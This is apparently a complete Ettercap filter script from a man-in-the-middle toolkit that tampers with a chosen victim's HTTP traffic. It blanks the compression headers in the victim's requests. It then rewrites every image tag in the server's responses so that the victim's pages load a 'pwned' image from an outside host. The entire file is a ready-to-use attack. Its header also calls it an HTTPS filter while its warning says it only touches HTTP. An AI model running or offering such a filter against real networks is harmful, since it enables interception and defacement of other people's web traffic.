############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################


##
#  This filter will substitute the html tag '<img src=>'
#  and injects your image in any webpage requested by TaRONE
#  Warning: This filter only modifies http traffic..
##




##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.proto == TCP && tcp.dst == 80) {
  msg("[morpheus] host:TaRONE   [ ⊶ ]");
    if (search(DATA.data, "Accept-Encoding")) {  
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("[Morpheus] | Status: Encoding zapped from response ✔");
    }else{
    if (search(DECODED.data, "Accept-Encoding")) {  
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("[Morpheus] | Status: Encoding zapped from response ✔");
    }
    }
}

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "gzip")) {  
    replace("gzip", "  "); # note: four spaces In the replacement string
    msg("[Morpheus] |  info : gzip zapped from response ✔");
    msg("[Morpheus] |_ info : Image injected and forward to target ✔\n"); 
   }  
}

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "deflate")) {
    replace("deflate", "       "); # note: seven spaces In the replacement string
    msg("[Morpheus] |  packet string deflate zapped ✔");
  }
}




#####################
## Replace Content ##
#####################
# change server response to target
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"http://3.bp.blogspot.com/-LYY46BB5FAE/UXhWPEJcokI/AAAAAAAAAKQ/uVGpXjOZusM/s400/pwned+DH.jpg\" ");  
  replace("IMG SRC=", "IMG SRC=\"http://3.bp.blogspot.com/-LYY46BB5FAE/UXhWPEJcokI/AAAAAAAAAKQ/uVGpXjOZusM/s400/pwned+DH.jpg\" ");   
} 

